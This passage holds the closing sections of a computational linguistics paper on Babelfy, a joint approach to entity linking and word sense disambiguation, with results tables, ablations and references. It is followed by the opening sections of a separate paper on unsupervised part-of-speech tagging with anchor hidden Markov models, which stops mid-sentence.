Fine-grained WSD. For the remaining fine- grained WSD datasets, i.e., Senseval-3 and SemEval-2007 task 17, we compared our approach with the previously described state-of-the-art systems UKB and IMS, and, as baseline, the MFS. KORE50 and AIDA-CoNLL. For the KORE50 and AIDA-CoNLL datasets we compared our sys- tem with six approaches, including state-of-the-art ones (Hoffart et al., 2012; Cornolti et al., 2013): • MW, i.e., the Normalized Google Distance as defined by Milne and Witten (2008); • KPCS (Hoffart et al., 2012), which calcu- lates a Mutual Information weighted vector of keyphrases for each candidate and then uses the cosine similarity to obtain candidates’ scores; • KORE and its variants KORELSH−G and KORELSH−F (Hoffart et al., 2012), based on similarity measures that exploit the overlap be- tween phrases associated with the considered entities (KORE) and a hashing technique to re- duce the space needed by the keyphrases asso- ciated with the entities (LSH-G, LSH-F); • Tagme 2.09 (Ferragina and Scaiella, 2012) which uses the relatedness measure defined 8We report the results as given by Agirre et al. (2014). 9We used the out-of-the-box RESTful API available at http://tagme.di.unipi.it 238 Sens3 Sem07 SemEval-2013 English French German Italian Spanish System WN WN WN Wiki BN Wiki BN Wiki BN Wiki BN Wiki BN Babelfy 68.3 62.7 65.9 87.4 69.2 71.6 ?56.9 81.6 69.4 84.3 66.6 83.8 69.5 IMS 71.2 63.3 65.7 – – – – – – – – – – UKB w2w ?65.3 ?56.0 61.3 – 60.8 – 60.8 – 66.2 – 67.3 – 70.0 UMCC-DLSI – – 64.7 54.8 68.5 ?60.5 60.5 ?58.1 62.8 ?58.3 65.8 ?61.0 71.0 DAEBAK! – – – – 60.4 – 53.8 – 59.1 – ?61.3 – 60.0 GETALP-BN – – 51.4 – 58.3 – 48.3 – 52.3 – 52.8 – 57.8 MFS 70.3 65.8 ?63.0 ?80.3 ?66.5 69.4 45.3 83.1 ?67.4 82.3 57.5 82.4 ?64.4 Babelfy unif. weights 67.0 65.2 65.0 87.0 68.5 71.9 57.2 81.2 69.8 83.7 66.8 83.8 70.8 Babelfy w/o dens. sub. 68.3 63.3 65.4 87.3 68.7 71.6 57.0 81.7 69.1 84.4 66.5 83.9 69.5 Babelfy only concepts 68.2 62.7 65.5 83.0 68.7 70.2 56.6 79.3 69.3 83.0 66.3 84.0 69.7 Babelfy on sentences 66.0 65.2 63.5 84.0 67.1 70.7 53.6 82.3 68.1 83.8 64.2 83.5 68.7 Table 1: F1 scores (percentages) of the participating systems of SemEval-2013 task 12 together with MFS, UKB w2w, IMS, our system and its ablated versions on the Senseval-3, SemEval-2007 task 17 and SemEval-2013 datasets. The first system which has a statistically significant difference from the top system is marked with ? (χ2, p < 0.05). by Milne and Witten (2008) weighted with the commonness of a sense together with the keyphraseness measure defined by Mihal- cea and Csomai (2007) to exploit the context around the target word; • Illinois Wikifier10 (Cheng and Roth, 2013) which combines local features, such as com- monness and TF-IDF between mentions and Wikipedia pages, with global coherence fea- tures based on Wikipedia links and relational inference; • DBpedia Spotlight11 (Mendes et al., 2011) which uses LingPipe’s string matching algo- rithm implementation together with a weighted cosine similarity measure to recognize and dis- ambiguate mentions. We also compared with UKB w2w, introduced above. Note that we could not use supervised sys- tems, as the training data of AIDA-CoNLL covers less than half of the mentions used in the testing part and less than 10% of the entities considered in KORE50. To enable a fair comparison, we ran our system by restricting the BabelNet sense inventory of the target mentions to the English Wikipedia. As is customary in the literature, we calculated the sys- tems’ accuracy for both Entity Linking datasets. 10We used the out-of-the-box Java API available from http://cogcomp.cs.illinois.edu/page/download view/Wikifier 11We used the 2011 version of DBpedia Spotlight as it ob- tains better scores on the considered datasets in comparison to the new version (Daiber et al., 2013). We used the out-of-the- box RESTful API available at http://spotlight.dbpedia.org 9 Results Multilingual WSD. In Table 1 we show the F1 performance on the SemEval-2013 task 12 for the three setups: WordNet, Wikipedia and BabelNet. Using BabelNet we surpass all systems on English and German and obtain performance comparable with the best systems on two other languages (UKB on Italian and UMCC-DLSI on Spanish). Using the WordNet sense inventory, our results are on a par with the best system, i.e., IMS. On Wikipedia our results range between 71.6% (French) and 87.4% F1 (English), i.e., more than 10 points higher than the current state of the art (UMCC-DLSI) in all 5 lan- guages. As for the MFS baseline, which is known to be very competitive in WSD (Navigli, 2009), we beat it in all setups except for German on Wikipedia. Interestingly, we surpass the WordNet MFS by 2.9 points, a significant result for a knowledge-based system (see also (Pilehvar and Navigli, 2014)). Coarse- and fine-grained WSD. In Table 2, we show the results of the systems on the SemEval- 2007 coarse-grained WSD dataset. As can be seen, we obtain the second best result after Ponzetto and Navigli (2010). In Table 1 (first two columns), we show the results of IMS and UKB on the Senseval-3 and SemEval-2007 task 17 datasets. We rank second on both datasets after IMS. However, the differences are not statistically significant. Moreover, Agirre et al. (2014, Table 5) note that using WordNet 3.0, in- stead of 1.7 or 2.1, to annotate these datasets can cause a more than one percent drop in performance. 239 System F1 (Ponzetto and Navigli, 2010) 85.5 Babelfy 84.6 UoR-SSI 84.1 UKB w2w 83.6 NUS-PT ?82.3 MFS 77.4 Babelfy unif. weights 85.7 Babelfy w/o dens. sub. 84.9 Babelfy only concepts 85.3 Babelfy on sentences 82.3 Table 2: F1 score (percentages) on the SemEval-2007 task 7. The first system which has a statistically signifi- cant difference from the top system is marked with ? (χ2, p < 0.05). Entity Linking. In Table 3 we show the results on the two Entity Linking datasets, i.e., KORE50 and AIDA-CoNLL. Our system outperforms all other approaches, with KORE-LSH-G getting closest, and Tagme and Wikifier lagging behind on the KORE50 dataset. For the AIDA-CoNLL dataset we obtain the third best performance after MW and KPCS, how- ever the difference is not statistically significant. We note the low performance of DBpedia Spot- light which, even if it achieves almost 100% preci- sion on the identified mentions on both datasets, suf- fers from low recall due to its candidate identifica- tion step, confirming previous evaluations (Derczyn- ski et al., 2013; Hakimov et al., 2012; Ludwig and Sack, 2011). This problem becomes even more ac- centuated in the latest version of this system (Daiber et al., 2013). Finally, UKB using BabelNet obtains low performance on EL, i.e., 19.4-10.5 points below the state of the art. This result is discussed below. Discussion. The results obtained by UKB show that the high performance of our unified approach to EL and WSD is not just a mere artifact of the use of a rich multilingual semantic network, that is, Ba- belNet. In other words, it is not true that any graph- based algorithm could be applied to perform both EL and WSD at the same time equally well. This also shows that BabelNet by itself is not sufficient for achieving high performances for both tasks and that, instead, an appropriate processing of the struc- tural and lexical information of the semantic net- work is needed. A manual analysis revealed that the main cause of error for UKB in the EL setup stems System KORE50 CoNLL Babelfy 71.5 82.1 KORE-LSH-G 64.6 81.8 KORE 63.9 ?80.7 MW ?57.6 82.3 Tagme 56.3 70.1 KPCS 55.6 82.2 KORE-LSH-F 53.2 81.2 UKB w2w (on BabelNet) 52.1 71.8 Illinois Wikifier 41.7 72.4 DBpedia Spotlight 35.4 34.0 Babelfy unif. weights 69.4 81.7 Babelfy w/o dens. sub. 62.5 78.1 Babelfy only NE 68.1 78.8 Table 3: Accuracy (percentages) of state-of-the-art EL systems and our system on KORE50 and AIDA-CoNLL. The first system with a statistically significant difference from the top system is marked with ? (χ2, p < 0.05). from its inability to enforce high coherence, e.g., by jointly disambiguating all the words, which is in- stead needed when considering the high level of am- biguity that we have in our semantic interpretation graph (Cucerzan, 2007). For instance, for sentence (1) in the introduction, UKB disambiguates Thomas as a cricket player and Mario as the popular video game rather than the two well-known soccer play- ers, and Munich as the German city, rather than the soccer team in which they play. Our approach, in- stead, by enforcing highly coherent semantic inter- pretations, correctly identifies all the soccer-related entities. In order to determine the need of our loose candi- date identification heuristic (see Section 6), we com- pared the percentage of times a candidate set con- tains the correct entity against that obtained by an exact string matching between the mention and the sense inventory. On KORE50, our heuristic retrieves the correct entity 98.6% of the time vs. 42.4% when exact matching is used. This demonstrates the inad- equacy of exact matching for EL, and the need for a comprehensive sense inventory, as is done in our approach. We also performed different ablation tests by ex- perimenting with the following variants of our sys- tem (reported at the bottom of Tables 1, 2 and 3): • Babelfy using uniform distribution during the RWR to obtain the concepts’ semantic sig- natures; this test assesses the impact of our weighting and edge creation strategy. 240 • Babelfy without performing the densest sub- graph heuristic, i.e., when line 12 in Algorithm 2 is G?I = GI , so as to verify the impact of identifying the most coherent interpretations. • Babelfy applied to the BabelNet subgraph in- duced by the entire set of named entity ver- tices, for the EL task, and that induced by word senses only, for the WSD task; this test aims to stress the impact of our unified approach. • Babelfy applied on sentences instead of on whole documents. The component which has a smaller impact on the performance is our triangle-based weighting scheme. The main exception is on the smallest dataset, i.e., SemEval-2007 task 17, for which this version attains an improvement of 2.5 percentage points. Babelfy without the densest subgraph algorithm is the version which attains the lowest performances on the EL task, with a 9% performance drop on the KORE50 dataset, showing the need for a specially designed approach to cope with the high level of am- biguity that is encountered on this task. On the other hand, in the WSD datasets this version attains almost the same results as the full version, due to the lower number of candidate word senses. Babelfy applied on sentences instead of on whole documents shows a lower performance, confirm- ing the significance of higher semantic coherence on whole documents (notwithstanding the two ex- ceptions on the SemEval-2007 task 17 and on the SemEval-2013 German Wikipedia datasets). Finally, the version in which we restrict our system to named entities only (for EL) and con- cepts only (for WSD) consistently obtains lower re- sults (notwithstanding the three exceptions on the Spanish SemEval-2013 task 12 using BabelNet and Wikipedia, and on the SemEval 2007 coarse-grained task). This highlights the benefit of our joint use of lexicographic and encyclopedic structured knowl- edge, on each of the two tasks. The 3.4% per- formance drop attained on KORE50 is of particu- lar interest, since this dataset aims at testing perfor- mance on highly ambiguous mentions within short sentences. This indicates that the semantic analysis of small contexts can be improved by leveraging the coherence between concepts and named entities. 10 Conclusion In this paper we presented Babelfy, a novel, integrated approach to Entity Linking and Word Sense Disambiguation, available at http://babelfy.org. Our joint solution is based on three key steps: i) the automatic creation of semantic signatures, i.e., related concepts and named entities, for each node in the reference semantic network; ii) the unconstrained identifica- tion of candidate meanings for all possible textual fragments; iii) linking based on a high-coherence densest subgraph algorithm. We used BabelNet 1.1.1 as our multilingual semantic network. Our graph-based approach exploits the semantic network structure to its advantage: two key features of BabelNet, that is, its multilinguality and its in- tegration of lexicographic and encyclopedic knowl- edge, make it possible to run our general, unified ap- proach on the two tasks of Entity Linking and WSD in any of the languages covered by the semantic net- work. However, we also demonstrated that Babel- Net in itself does not lead to state-of-the-art accu- racy on both tasks, even when used in conjunction with a high-performance graph-based algorithm like Personalized PageRank. This shows the need for our novel unified approach to EL and WSD. At the core of our approach lies the effective treat- ment of the high degree of ambiguity of partial tex- tual mentions by means of a 2-approximation algo- rithm for the densest subgraph problem, which en- ables us to output a semantic interpretation of the input text with drastically reduced ambiguity, as was previously done with SSI (Navigli, 2008). Our experiments on six gold-standard datasets show the state-of-the-art performance of our ap- proach, as well as its robustness across languages. Our evaluation also demonstrates that our approach fares well both on long texts, such as those of the WSD tasks, and short and highly-ambiguous sen- tences, such as the ones in KORE50. Finally, abla- tion tests and further analysis demonstrate that each component of our system is needed to contribute state-of-the-art performances on both EL and WSD. As future work, we plan to use Babelfy for in- formation extraction, where semantics is taking the lead (Moro and Navigli, 2013), and for the valida- tion of semantic annotations (Vannella et al., 2014). 241 Acknowledgments The authors gratefully acknowl- edge the support of the ERC Start- ing Grant MultiJEDI No. 259234. References Eneko Agirre and Aitor Soroa. 2009. Personalizing PageRank for Word Sense Disambiguation. In Proc. of EACL, pages 33–41. Eneko Agirre, David Martı́nez, Oier López de Lacalle, and Aitor Soroa. 2006. Two graph-based algorithms for state-of-the-art WSD. In Proc. of EMNLP, pages 585–593. Eneko Agirre, Aitor Soroa, and Mark Stevenson. 2010. Graph-based Word Sense Disambiguation of biomedi- cal documents. Bioinformatics, 26(22):2889–2896. Eneko Agirre, Oier Lopez de Lacalle, and Aitor Soroa. 2014. Random Walks for Knowledge-Based Word Sense Disambiguation. Computational Linguistics, 40(1):57–84. Sören Auer, Christian Bizer, Georgi Kobilarov, Jens Lehmann, Richard Cyganiak, and Zachary Ives. 2007. DBpedia: A Nucleus for a Web of Open Data. In Proc. of ISWC/ASWC, pages 722–735. Carmen Banea and Rada Mihalcea. 2011. Word Sense Disambiguation with multilingual features. In Proc. of IWCS, pages 25–34. Christoph Böhm, Gerard de Melo, Felix Naumann, and Gerhard Weikum. 2012. LINDA: distributed web-of- data-scale entity matching. In Proc. of CIKM, pages 2104–2108. Samuel Brody and Mirella Lapata. 2009. Bayesian Word Sense Induction. In Proc. of EACL, pages 103–111. Razvan C. Bunescu and Marius Pasca. 2006. Using en- cyclopedic knowledge for named entity disambigua- tion. In Proc. of EACL, pages 9–16. Yee Seng Chan, Hwee Tou Ng, and Zhi Zhong. 2007. NUS-PT: Exploiting Parallel Texts for Word Sense Disambiguation in the English All-Words Tasks. In Proc. of SemEval-2007, pages 253–256. Moses Charikar. 2000. Greedy approximation algo- rithms for finding dense components in a graph. In Proc. of APPROX, pages 84–95. Xiao Cheng and Dan Roth. 2013. Relational Inference for Wikification. In Proc. of EMNLP, pages 1787– 1796. Marco Cornolti, Paolo Ferragina, and Massimiliano Cia- ramita. 2013. A framework for benchmarking entity- annotation systems. In Proc. of WWW, pages 249– 260. Silviu Cucerzan. 2007. Large-Scale Named Entity Dis- ambiguation Based on Wikipedia Data. In Proc. of EMNLP-CoNLL, pages 708–716. Joachim Daiber, Max Jakob, Chris Hokamp, and Pablo N. Mendes. 2013. Improving efficiency and accuracy in multilingual entity extraction. In Proc. of I-Semantics, pages 121–124. Leon Derczynski, Diana Maynard, Niraj Aswani, and Kalina Bontcheva. 2013. Microblog-genre noise and impact on semantic annotation accuracy. In Proc. of Hypertext, pages 21–30. Antonio Di Marco and Roberto Navigli. 2013. Cluster- ing and Diversifying Web Search Results with Graph- Based Word Sense Induction. Computational Linguis- tics, 39(3):709–754. Nicolai Erbs, Torsten Zesch, and Iryna Gurevych. 2011. Link discovery: A comprehensive analysis. In Proc. of ICSC, pages 83–86. Oren Etzioni, Michele Banko, and Michael J Cafarella. 2006. Machine Reading. In Proc. of AAAI, pages 1517–1519. Uriel Feige, Guy Kortsarz, and David Peleg. 1999. The dense k-subgraph problem. Algorithmica, 29:2001. Christiane Fellbaum. 1998. WordNet: An Electronic Lexical Database. MIT Press. Paolo Ferragina and Ugo Scaiella. 2010. TAGME: On-the-fly Annotation of Short Text Fragments (by Wikipedia Entities). In Proc. of CIKM, pages 1625– 1628. Paolo Ferragina and Ugo Scaiella. 2012. Fast and Accu- rate Annotation of Short Texts with Wikipedia Pages. IEEE Software, 29(1):70–75. Weiwei Guo and Mona T. Diab. 2010. Combining Orthogonal Monolingual and Multilingual Sources of Evidence for All Words WSD. In Proc. of ACL, pages 1542–1551. Yoan Gutiérrez, Yenier Castañeda, Andy González, Rainel Estrada, Dennys D. Piug, Jose I. Abreu, Roger Pérez, Antonio Fernández Orquı́n, Andrés Montoyo, Rafael Muñoz, and Franc Camara. 2013. UMCC DLSI: Reinforcing a Ranking Algorithm with Sense Frequencies and Multidimensional Semantic Resources to solve Multilingual Word Sense Disam- biguation. In Proc. of SemEval-2013, pages 241–249. Ben Hachey, Will Radford, Joel Nothman, Matthew Hon- nibal, and James R. Curran. 2013. Evaluating En- tity Linking with Wikipedia. Artificial Intelligence, 194:130–150. Sherzod Hakimov, Salih Atilay Oto, and Erdogan Dogdu. 2012. Named entity recognition and disambiguation using linked data and graph-based centrality scoring. In Proc. of SWIM, pages 4:1–4:7. Taher H. Haveliwala. 2002. Topic-sensitive PageRank. In Proc. of WWW, pages 517–526. 242 Johannes Hoffart, Mohamed Amir Yosef, Ilaria Bordino, Hagen Fürstenau, Manfred Pinkal, Marc Spaniol, Bilyana Taneva, Stefan Thater, and Gerhard Weikum. 2011. Robust disambiguation of named entities in text. In Proc. of EMNLP, pages 782–792. Johannes Hoffart, Stephan Seufert, Dat Ba Nguyen, Mar- tin Theobald, and Gerhard Weikum. 2012. KORE: keyphrase overlap relatedness for entity disambigua- tion. In Proc. of CIKM, pages 545–554. Johannes Hoffart, Fabian M Suchanek, Klaus Berberich, and Gerhard Weikum. 2013. YAGO2: A spatially and temporally enhanced knowledge base from Wikipedia. Artificial Intelligence, 194:28–61. Eduard H. Hovy, Roberto Navigli, and Simone P. Ponzetto. 2013. Collaboratively built semi-structured content and Artificial Intelligence: The story so far. Artificial Intelligence, 194:2–27. Samir Khuller and Barna Saha. 2009. On finding dense subgraphs. In Proc. of ICALP, pages 597–608. Sayali Kulkarni, Amit Singh, Ganesh Ramakrishnan, and Soumen Chakrabarti. 2009. Collective Annotation of Wikipedia Entities in Web Text. In Proc. of KDD, pages 457–466. Els Lefever and Véronique Hoste. 2010. Semeval-2010 task 3: Cross-lingual Word Sense Disambiguation. In Proc. of SemEval-2010, pages 15–20. Els Lefever and Véronique Hoste. 2013. SemEval-2013 Task 10: Cross-lingual Word Sense Disambiguation. In Proc. of SemEval-2013, pages 158–166. Els Lefever, Véronique Hoste, and Martine De Cock. 2011. Parasense or how to use parallel corpora for Word Sense Disambiguation. In Proc. of ACL-HLT, pages 317–322. Michael E. Lesk. 1986. Automatic Sense Disambigua- tion Using Machine Readable Dictionaries: How to Tell a Pine Cone from an Ice Cream Cone. In Proc. of the International Conference on Systems Documen- tation, pages 24–26. Nadine Ludwig and Harald Sack. 2011. Named entity recognition for user-generated tags. In Proc. of DEXA, pages 177–181. Suresh Manandhar, Ioannis P. Klapaftis, Dmitriy Dli- gach, and Sameer S. Pradhan. 2010. SemEval-2010 task 14: Word sense induction & disambiguation. In Proc. of SemEval-2010, pages 63–68. Steve L. Manion and Raazesh Sainudiin. 2013. DAE- BAK!: Peripheral Diversity for Multilingual Word Sense Disambiguation. In Proc. of SemEval-2013, pages 250–254. Pablo N. Mendes, Max Jakob, Andrés Garcı́a-Silva, and Christian Bizer. 2011. DBpedia spotlight: shed- ding light on the web of documents. In Proc. of I- Semantics, pages 1–8. Rada Mihalcea and Andras Csomai. 2007. Wikify!: link- ing documents to encyclopedic knowledge. In Proc. of CIKM, pages 233–242. Rada Mihalcea and Dan I Moldovan. 2001. Extended WordNet: Progress report. In Proc. of NAACL Work- shop on WordNet and Other Lexical Resources, pages 95–100. Rada Mihalcea. 2005. Unsupervised large-vocabulary word sense disambiguation with graph-based algo- rithms for sequence data labeling. In Proc. of HLT/EMNLP, pages 411–418. George A. Miller, Claudia Leacock, Randee Tengi, and Ross T. Bunker. 1993. A semantic concordance. In Proc. of HLT, pages 303–308. Tristan Miller, Chris Biemann, Torsten Zesch, and Iryna Gurevych. 2012. Using Distributional Similarity for Lexical Expansion in Knowledge-based Word Sense Disambiguation. In Proc. of COLING, pages 1781– 1796. David Milne and Ian H. Witten. 2008. Learning to link with Wikipedia. In Proc. of CIKM, pages 509–518. Andrea Moro and Roberto Navigli. 2013. Integrating Syntactic and Semantic Analysis into the Open Infor- mation Extraction Paradigm. In Proc. of IJCAI, pages 2148–2154. Roberto Navigli and Mirella Lapata. 2010. An Experi- mental Study of Graph Connectivity for Unsupervised Word Sense Disambiguation. TPAMI, 32(4):678–692. Roberto Navigli and Simone Paolo Ponzetto. 2012a. Ba- belNet: The automatic construction, evaluation and application of a wide-coverage multilingual semantic network. Artificial Intelligence, 193:217–250. Roberto Navigli and Simone Paolo Ponzetto. 2012b. Joining forces pays off: Multilingual Joint Word Sense Disambiguation. In Proc. of EMNLP, pages 1399– 1410. Roberto Navigli, Kenneth C. Litkowski, and Orin Har- graves. 2007. SemEval-2007 Task 07: Coarse- Grained English All-Words Task. In Proc. of SemEval-2007, pages 30–35. Roberto Navigli, David Jurgens, and Daniele Vannella. 2013. SemEval-2013 Task 12: Multilingual Word Sense Disambiguation. In Proc. of SemEval-2013, pages 222–231. Roberto Navigli. 2008. A structural approach to the automatic adjudication of word sense disagreements. Natural Language Engineering, 14(4):293–310. Roberto Navigli. 2009. Word Sense Disambiguation: A survey. ACM Computing Surveys, 41(2):1–69. Roberto Navigli. 2012. A Quick Tour of Word Sense Disambiguation, Induction and Related Approaches. In Proc. of SOFSEM, pages 115–129. 243 Hwee Tou Ng and Hian Beng Lee. 1996. Integrat- ing multiple knowledge sources to disambiguate word sense: An exemplar-based approach. In Proc. of ACL, pages 40–47. Mohammad Taher Pilehvar and Roberto Navigli. 2014. A Large-scale Pseudoword-based Evaluation Frame- work for State-of-the-Art Word Sense Disambigua- tion. Computational Linguistics. Simone P. Ponzetto and Roberto Navigli. 2010. Knowledge-rich Word Sense Disambiguation rivaling supervised system. In Proc. of ACL, pages 1522–1531. Sameer S. Pradhan, Edward Loper, Dmitriy Dligach, and Martha Palmer. 2007. SemEval-2007 task 17: En- glish lexical sample, SRL and all words. In Proc. of SemEval-2007, pages 87–92. Association for Compu- tational Linguistics. Delip Rao, Paul McNamee, and Mark Dredze. 2013. En- tity Linking: Finding Extracted Entities in a Knowl- edge Base. In Multi-source, Multilingual Information Extraction and Summarization, Theory and Applica- tions of Natural Language Processing, pages 93–115. Springer Berlin Heidelberg. Lev-Arie Ratinov, Dan Roth, Doug Downey, and Mike Anderson. 2011. Local and Global Algorithms for Disambiguation to Wikipedia. In Proc. of ACL, pages 1375–1384. Lenhart K. Schubert. 2006. Turing’s dream and the knowledge challenge. In Proc. of NCAI, pages 1534– 1538. Didier Schwab, Andon Tchechmedjiev, Jérôme Goulian, Mohammad Nasiruddin, Gilles Sérasset, and Hervé Blanchon. 2013. GETALP System: Propagation of a Lesk Measure through an Ant Colony Algorithm. In Proc. of SemEval-2013, pages 232–240. Hui Shen, Razvan Bunescu, and Rada Mihalcea. 2013. Coarse to Fine Grained Sense Disambiguation in Wikipedia. In Proc. of *SEM, pages 22–31. Ravi Sinha and Rada Mihalcea. 2007. Unsupervised Graph-based Word Sense Disambiguation Using Mea- sures of Word Semantic Similarity. In Proc. of ICSC, pages 363–369. Benjamin Snyder and Martha Palmer. 2004. The English all-words task. In Proc. of Senseval-3, pages 41–43. Carlo Strapparava and Alessandro Valitutti. 2004. Word- Net Affect: an Affective Extension of WordNet. In Proc. of LREC, pages 1083–1086. Hanghang Tong, Christos Faloutsos, and Jia-Yu Pan. 2006. Fast Random Walk with Restart and Its Appli- cations. In Proc. of ICDM, pages 613–622. Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic dependency network. In Proc. of NAACL-HLT, pages 173–180. George Tsatsaronis, Michalis Vazirgiannis, and Ion An- droutsopoulos. 2007. Word Sense Disambiguation with Spreading Activation Networks Generated from Thesauri. In Proc. of IJCAI, pages 1725–1730. Tim Van de Cruys and Marianna Apidianaki. 2011. La- tent Semantic Word Sense Induction and Disambigua- tion. In Proc. of ACL, pages 1476–1485. Daniele Vannella, David Jurgens, Daniele Scarfini, Domenico Toscani, and Roberto Navigli. 2014. Vali- dating and Extending Semantic Knowledge Bases us- ing Video Games with a Purpose. In Proc. of ACL. Duncan J. Watts and Steven H. Strogatz. 1998. Col- lective dynamics of ’small-world’ networks. Nature, 393(6684):409–10. Zhi Zhong and Hwee Tou Ng. 2010. It Makes Sense: A Wide-Coverage Word Sense Disambiguation System for Free Text. In Proc. of ACL (Demo), pages 78–83. Amal Zouaq, Michel Gagnon, and Benoit Ozell. 2009. A SUMO-based Semantic Analysis for Knowledge Ex- traction. In Proc of LTC. 244 work_7drikjhpivhsjj7hgjbx3kyriy ---- Unsupervised Part-Of-Speech Tagging with Anchor Hidden Markov Models Karl Stratos, Michael Collins∗ and Daniel Hsu Department of Computer Science, Columbia University {stratos, mcollins, djhsu}@cs.columbia.edu Abstract We tackle unsupervised part-of-speech (POS) tagging by learning hidden Markov models (HMMs) that are particularly well-suited for the problem. These HMMs, which we call an- chor HMMs, assume that each tag is associ- ated with at least one word that can have no other tag, which is a relatively benign con- dition for POS tagging (e.g., “the” is a word that appears only under the determiner tag). We exploit this assumption and extend the non-negative matrix factorization framework of Arora et al. (2013) to design a consistent estimator for anchor HMMs. In experiments, our algorithm is competitive with strong base- lines such as the clustering method of Brown et al. (1992) and the log-linear model of Berg- Kirkpatrick et al. (2010). Furthermore, it pro- duces an interpretable model in which hidden states are automatically lexicalized by words. 1 Introduction Part-of-speech (POS) tagging without supervision is a quintessential problem in unsupervised learning for natural language processing (NLP). A major ap- plication of this task is reducing annotation cost: for instance, it can be used to produce rough syntactic annotations for a new language that has no labeled data, which can be subsequently refined by human annotators. Hidden Markov models (HMMs) are a natural choice of model and have been a workhorse for this problem. Early works estimated vanilla HMMs ∗Currently on leave at Google Inc. New York. with standard unsupervised learning methods such as the expectation-maximization (EM) algorithm, but it quickly became clear that they performed very poorly in inducing POS tags (Merialdo, 1994). Later works improved upon vanilla HMMs by incorporat- ing specific structures that are well-suited for the task, such as a sparse prior (Johnson, 2007) or a hard-clustering assumption (Brown et al., 1992). In this work, we tackle unsupervised POS tagging with HMMs whose structure is deliberately suitable for POS tagging. These HMMs impose an assump- tion that each hidden state is associated with an ob- servation state (“anchor word”) that can appear un- der no other state. For this reason, we denote this class of restricted HMMs by anchor HMMs. Such an assumption is relatively benign for POS tagging; it is reasonable to assume that each POS tag has at least one word that occurs only under that tag. For example, in English, “the” is an anchor word for the determiner tag; “laughed” is an anchor word for the verb tag. We build on the non-negative matrix factoriza- tion (NMF) framework of Arora et al. (2013) to de- rive a consistent estimator for anchor HMMs. We make several new contributions in the process. First, to our knowledge, there is no previous work di- rectly building on this framework to address unsu- pervised sequence labeling. Second, we generalize the NMF-based learning algorithm to obtain exten- sions that are important for empirical performance (Table 1). Third, we perform extensive experiments on unsupervised POS tagging and report competitive results against strong baselines such as the cluster- ing method of Brown et al. (1992) and the log-linear 245 Transactions of the Association for Computational Linguistics, vol. 4, pp. 245–257, 2016. Action Editor: Hinrich Schütze. Submission batch: 1/2016; Revision batch: 3/2016; Published 6/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. model of Berg-Kirkpatrick et al. (2010). One characteristic of the approach is the imme- diate interpretability of inferred hidden states. Be- cause each hidden state is associated with an obser- vation, we can examine the set of such anchor obser- vations to qualitatively evaluate the learned model. In our experiments on POS tagging, we find that an- chor observations correspond to possible POS tags across different languages (Table 3). This property can be useful when we wish to develop a tagger for a new language that has no labeled data; we can label only the anchor words to achieve a complete label- ing of the data. This paper is structured as follows. In Section 2, we establish the notation we use throughout. In Sec- tion 3, we define the model family of anchor HMMs. In Section 4, we derive a matrix decomposition al- gorithm for estimating the parameters of an anchor HMM. In Section 5, we present our experiments on unsupervised POS tagging. In Section 6, we discuss related works. 2 Notation We use [n] to denote the set of integers {1, . . . ,n}. We use E[X] to denote the expected value of a ran- dom variable X. We define ∆m−1 := {v ∈ Rm : vi ≥ 0 ∀i, ∑ i vi = 1}, i.e., the (m−1)-dimensional probability simplex. Given a vector v ∈ Rm, we use diag(v) ∈ Rm×m to denote the diagonal matrix with v1 . . .vm on the main diagonal. Given a matrix M ∈ Rn×m, we write Mi ∈ Rm to denote the i-th row of M (as a column vector). 3 The Anchor Hidden Markov Model Definition 3.1. An anchor HMM (A-HMM) is a 6- tuple (n,m,π,t,o,A) for positive integers n,m and functions π,t,o,A where • [n] is a set of observation states. • [m] is a set of hidden states. • π(h) is the probability of generating h ∈ [m] in the first position of a sequence. • t(h′|h) is the probability of generating h′ ∈ [m] given h ∈ [m]. • o(x|h) is the probability of generating x ∈ [n] given h ∈ [m]. • A(h) := {x ∈ [n] : o(x|h) > 0 ∧ o(x|h′) = 0 ∀h′ 6= h} is non-empty for each h ∈ [m]. In other words, an A-HMM is an HMM in which each hidden state h is associated with at least one “anchor” observation state that can be generated by, and only by, h. Note that the anchor condition im- plies n ≥ m. An equivalent definition of an A-HMM is given by organizing the parameters in matrix form. Under this definition, an A-HMM has parameters (π,T,O) where π ∈ Rm is a vector and T ∈ Rm×m,O ∈ Rn×m are matrices whose entries are set to: • πh = π(h) for h ∈ [m] • Th′,h = t(h′|h) for h,h′ ∈ [m] • Ox,h = o(x|h) for h ∈ [m],x ∈ [n] The anchor condition implies that rank(O) = m. To see this, consider the rows Oa1 . . .Oam where ah ∈ A(h). Since each Oah has a single non-zero entry at the h-th index, the columns of O are linearly independent. We assume rank(T) = m. An important special case of A-HMM introduced by Brown et al. (1992) is defined below. Under this A-HMM, every observation state is an anchor of some hidden state. Definition 3.2. A Brown model is an A-HMM in which A(1) . . .A(m) partition [n]. 4 Parameter Estimation for A-HMMs We now derive an algorithm for learning A-HMMs. The algorithm reduces the learning problem to an instance of NMF from which the model parameters can be computed in closed-form. 4.1 NMF We give a brief review of the NMF method of Arora et al. (2013). (Exact) NMF is the following problem: given an n × d matrix A = BC where B ∈ Rn×m and C ∈ Rm×d have non-negativity constraints, re- cover B and C. This problem is NP-hard in general (Vavasis, 2009), but Arora et al. (2013) provide an exact and efficient method when A has the follow- ing special structure: Condition 4.1. A matrix A ∈ Rn×d satisfies this condition if A = BC for B ∈ Rn×m and C ∈ Rm×d where 246 Anchor-NMF Input: A ∈ Rn×d satisfying Condition 4.1 with A = BC for some B ∈ Rn×m and C ∈ Rm×d, value m • For h = 1 . . .m, find a vertex ah as U ← Gram-Schmidt({Aal}h−1l=1 ) ah ← arg max x∈[n] ∣∣∣∣Ax −UU>Ax ∣∣∣∣ 2 where Gram-Schmidt({Aal}h−1l=1 ) is the Gram- Schmidt process that orthonormalizes {Aal}h−1l=1 . • For x = 1 . . .n, recover the x-th row of B as Bx ← arg min u∈∆m−1 ∣∣∣∣∣ ∣∣∣∣∣Ax − m∑ h=1 uhAah ∣∣∣∣∣ ∣∣∣∣∣ 2 (1) • Set C = [Aa1 . . .Aam ]>. Output: B and C such that B>h = B > ρ(h) and Ch = Cρ(h) for some permutation ρ : [m] → [m] Figure 1: Non-negative matrix factorization algorithm of Arora et al. (2012). 1. For each x ∈ [n], Bx ∈ ∆m−1. I.e., each row of B defines a probability distribution over [m]. 2. For each h ∈ [m], there is some ah ∈ [n] such that Bah,h = 1 and Bah,h′ = 0 for all h ′ 6= h. 3. rank(C) = m. Since rank(B) = rank(C) = m (by property 2 and 3), the matrix A must have rank m. Note that by property 1, each row of A is given by a 